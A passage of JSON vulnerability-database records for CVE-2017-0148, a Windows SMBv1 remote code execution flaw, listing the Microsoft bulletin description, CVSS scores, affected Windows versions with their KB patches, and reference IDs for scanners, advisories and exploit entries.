"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4013198", "KB4012598", "KB4012606", "KB3210720", "KB3210721", "KB4012214", "KB3177186", 
"KB3212646", "KB4012216", "KB4012215", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB3205401", "KB4013429", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T10:52:46", "differentElements": ["msAffectedSoftware"], "edition": 51}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T12:43:31", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T12:43:31", "differentElements": ["msAffectedSoftware"], "edition": 52}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T16:50:29", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", 
"KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
